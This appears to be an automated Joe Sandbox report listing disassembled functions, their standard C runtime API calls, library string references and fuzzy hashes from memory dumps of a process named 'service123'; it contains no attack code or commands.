Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: 83d8c41194f4b0dcd368c87e0b0030496abd7b52d336db917cff89fa950c9cec
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: AF61F5B4A49705CFC724DF29D68051ABBE1BFE8754F208D2DE4998B761E730E844CB52

Function 6C800720 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C799053,00000003), ref: 6C80079D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C799053,00000003), ref: 6C8007DC

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: c5a0c45efa647cb035961d6ccc5d596dce5656f92ee49b0a68f216927ed97f39
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: 1861E5B4A09745CFC724DF19C68051AFBE0BF99754F10892DE8A98B761D731E844CF92

Function 6C802940 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C7F711E), ref: 6C8029B3

Strings

basic_string::_M_create, xrefs: 6C8029CA, 6C802A6A
basic_string::basic_string, xrefs: 6C802ABC, 6C802B19
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C802AC4, 6C802B21, 6C802B86
string::string, xrefs: 6C802B7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: ac70f2624ed970632fc57a2974de9adeb82b7e159c29825b4b58305cc03be448
Instruction ID: 4952646c1620b5df84beb3835bacebe5b44b7bff8c4cf9adf4252ba661d32820
Opcode Fuzzy Hash: ac70f2624ed970632fc57a2974de9adeb82b7e159c29825b4b58305cc03be448
Instruction Fuzzy Hash: 6B7180B29093508FC310DF2CD58464AFBE0BF99218F55C9AEE88C9B316D375D945CB92

Function 6C76EB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: d849e3dbfe57e7e19795b463d3310dccf90e0e75034ec5f9a7a84c2a01ec7ab9
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 8761827160930C8FD710CF1ACA8065AF7E1AF88308F548E2DEC989BF45E734D9458BA6

Function 6C77AE10 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C77ACEF), ref: 6C835FF0
abort.MSVCRT(?,?,?,?,?,?,6C77AC4C,?,?,?,?,?,?,6C836040), ref: 6C835FF8
abort.MSVCRT(?,?,?,?,?,?,6C77AC4C,?,?,?,?,?,?,6C836040), ref: 6C836000
abort.MSVCRT(?,?,?,?,?,?,6C77AC4C,?,?,?,?,?,?,6C836040), ref: 6C836008

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 361be9a7fc43963524be94810be8825484098fdc38ed4ee7d45dbad957248493
Instruction ID: 1801655f22181ab7b6a0a5c7f3c94dc1fcad06e354a2a146e2237e1e79609650
Opcode Fuzzy Hash: 361be9a7fc43963524be94810be8825484098fdc38ed4ee7d45dbad957248493
Instruction Fuzzy Hash: 5E4136716053288BDF20AF78C6851AE77B5BF8221CF14AC7DD4888BB14D735C84AC7A1

Function 6C761020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C761281,?,?,?,?,?,?,6C7613AE), ref: 6C761057
_amsg_exit.MSVCRT ref: 6C761086

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 0e534db2290f6ed6fe3e1acaddd4b45ed823f16881ca8bb229767a3b3136408c
Instruction ID: 670e24ca5b099f712578363c9f4f01929817a9c7c1c2f810cbb1031e6e9f42a5
Opcode Fuzzy Hash: 0e534db2290f6ed6fe3e1acaddd4b45ed823f16881ca8bb229767a3b3136408c
Instruction Fuzzy Hash: 7E315D7170A2418BDB209F2FC6C935A77F4EB46388F508539E9948BE80D735C888DBD2

Function 6C781CB0 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C781CC8
strlen.MSVCRT ref: 6C781CD2
memcpy.MSVCRT ref: 6C781CEF
setlocale.MSVCRT ref: 6C781D02
wcsftime.MSVCRT ref: 6C781D26
setlocale.MSVCRT ref: 6C781D38

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction ID: 69e6e05de385c8d9b56cbf545b13291da23bb447f33a520baa3dc382184ce727
Opcode Fuzzy Hash: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction Fuzzy Hash: 5D11D6B050A3149FCB40AF69C58865EFBF4BF98754F429C2DE4C98B710E7789845CBA2

Function 6C781A00 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C781A18
strlen.MSVCRT ref: 6C781A22
memcpy.MSVCRT ref: 6C781A3F
setlocale.MSVCRT ref: 6C781A52
strftime.MSVCRT ref: 6C781A76
setlocale.MSVCRT ref: 6C781A88

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction ID: 448cd2c0f34efda6eca38b00a556e82293799211a93763e937139aeb4b1f21a5
Opcode Fuzzy Hash: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction Fuzzy Hash: E911D6B050A3149FCB40AF69C68875EBBF4BF94654F428C2DE4C98B701D7789844CBA2

Function 6C76ED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: e6c7a3db50d7b87f5d35c2d1584d99f1d49ebf5aac7772a9c26fb3d7f3cb2d95
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: 88B01231CCA17CC6CC3055FE471C3D6A22DB753348F412C2BC95BA3C088A13A043C1A6

Function 6C77DE80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C77DEC7
LocalFree.KERNEL32 ref: 6C77DEFB

Strings

Unknown error code, xrefs: 6C77DF3C
basic_string: construction from null is not valid, xrefs: 6C77DF57

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: f7980f317565a5aaaa97e90e49c651fe0cfc7c2a91a804640b2c6e5c1d435a9f
Instruction ID: 479e7d41f9aa49654f75129b6ddcbada09da50c85da7db82db6943b388468cf7
Opcode Fuzzy Hash: f7980f317565a5aaaa97e90e49c651fe0cfc7c2a91a804640b2c6e5c1d435a9f
Instruction Fuzzy Hash: 45416CB19047149BCB20AFA9C64569EFBF4FF85318F419C2CE88997B10D7749449CBD2

Function 001E2F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 001E2E97
fputc.MSVCRT ref: 001E2F07
memset.MSVCRT ref: 001E2FC2

Strings

o, xrefs: 001E2FCA
0, xrefs: 001E2FB7

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: fc82c51f1470c18da418e3c74634aa6da8f8ef2ebc692908284e4f62401c9d59
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: B3317E71904B55CFCB14CF6AC0A47AEBBF5BF58310F158519E999AB342D338E900CB90

Function 6C773659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C773567
fputc.MSVCRT ref: 6C7735D7
memset.MSVCRT ref: 6C773692

Strings

o, xrefs: 6C77369A
0, xrefs: 6C773687

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: 66916c8507df44639dc7b8991da17effcc317a0ccf1925ae40f71ad8cb72578c
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: 69315EB1A093098FCF20CF69C2C47A9B7F1BF48314F158629D595ABB41D738E805CB60

Function 6C769490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C7694C2
strlen.MSVCRT ref: 6C769616

Strings

_GLOBAL_, xrefs: 6C7694B7

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 58c72f3891ca54fff9bd4b7febd75eb30d5d7fe613ad39fc25823509b682fc08
Instruction ID: 982e9462e5eb0e6d49bb7742f8e9898899de45109e18bccc1738b84370044d83
Opcode Fuzzy Hash: 58c72f3891ca54fff9bd4b7febd75eb30d5d7fe613ad39fc25823509b682fc08
Instruction Fuzzy Hash: E6F17E709053188FEB20CF2AC9943DDBBF1AF56308F1441EAC859ABB45D7759A89CF81

Function 6C7DD860 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C7FF670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C7DD7DE), ref: 6C7FF70D
Part of subcall function 6C7FF670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C7DD7DE), ref: 6C7FF738

memcpy.MSVCRT ref: 6C7DDA65

Part of subcall function 6C8022E0: memcpy.MSVCRT(?,-00000001,?,6C78724E,?,?,?,?,?,?,?,?,?,?,?,6C788BD5), ref: 6C80231C

Strings

iostream error, xrefs: 6C7DDAB8
Unknown error, xrefs: 6C7DD8B8
basic_string::append, xrefs: 6C7DDB62, 6C7DDB6E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: ed27bf7e2c8a80d7f159669b977b86daf981247a7e455a535cbf5bc4da32e8e0
Instruction ID: f18daaa6ee08322879519b18ad905ce2c35a755a87cf17d23027077c3367fffc
Opcode Fuzzy Hash: ed27bf7e2c8a80d7f159669b977b86daf981247a7e455a535cbf5bc4da32e8e0
Instruction Fuzzy Hash: D7A10371D043188FCB20DFA8C68469DBBF1BF59314F26892ED499AB751E730A845CF92

Function 6C7CBD10 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C7CBDEF
memcpy.MSVCRT ref: 6C7CBE49
memcpy.MSVCRT ref: 6C7CBED7

Part of subcall function 6C7CC2B0: memcpy.MSVCRT ref: 6C7CC33C

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C7CBF63
basic_string::replace, xrefs: 6C7CBF44, 6C7CBF57

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: ef2314a30abfd85b754101ef9d7a1f02bf3961d5d843a559250bc41561ef0584
Instruction ID: 90c54bce0156834b979860ceefed20b081535f8fa3c518ff1f94f2e360afe81d
Opcode Fuzzy Hash: ef2314a30abfd85b754101ef9d7a1f02bf3961d5d843a559250bc41561ef0584
Instruction Fuzzy Hash: DE816771B0561A9FCB00DF68C68459EBBF5FF88714F11896EE8888B710D730E944CB92

Function 6C7D4DB0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C7D4E80
memcpy.MSVCRT ref: 6C7D4ED4
memcpy.MSVCRT ref: 6C7D4F68

Part of subcall function 6C7D5340: memcpy.MSVCRT ref: 6C7D53D0

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C7D4FF8
basic_string::replace, xrefs: 6C7D4FD9, 6C7D4FEC

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: e262ee68d3a992abfe73592122f986f78747dfa0db079ae629328332386a6920
Instruction ID: 55add7ebbecae9b3cb749919ada6cc35e08bb140dab5467e7db64a7231bbe7e0
Opcode Fuzzy Hash: e262ee68d3a992abfe73592122f986f78747dfa0db079ae629328332386a6920
Instruction Fuzzy Hash: 7A816876A093159FCB00DF6CC68458EBBF5BF88254F16892EE898D7710D730E844DB92

Function 6C7DD5C0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7FF670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C7DD7DE), ref: 6C7FF70D
Part of subcall function 6C7FF670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C7DD7DE), ref: 6C7FF738

strlen.MSVCRT ref: 6C7DD695
memcpy.MSVCRT ref: 6C7DD76E

Strings

iostream error, xrefs: 6C7DD7C2
Unknown error, xrefs: 6C7DD60E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: 817e438d7bb0a2d0704d34e65851be86a0c1a615daf21f91995fb303c7a561de
Instruction ID: 3cc5e95bca4adb2d754746087aac4bd16a92fb6010d8cc3aed3721ddffb4b8be
Opcode Fuzzy Hash: 817e438d7bb0a2d0704d34e65851be86a0c1a615daf21f91995fb303c7a561de
Instruction Fuzzy Hash: 5B61F5B09043089FCB14DFA8C58469EBBF1BF88314F11C92EE4999B754E774A849CF92

Function 6C76F840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

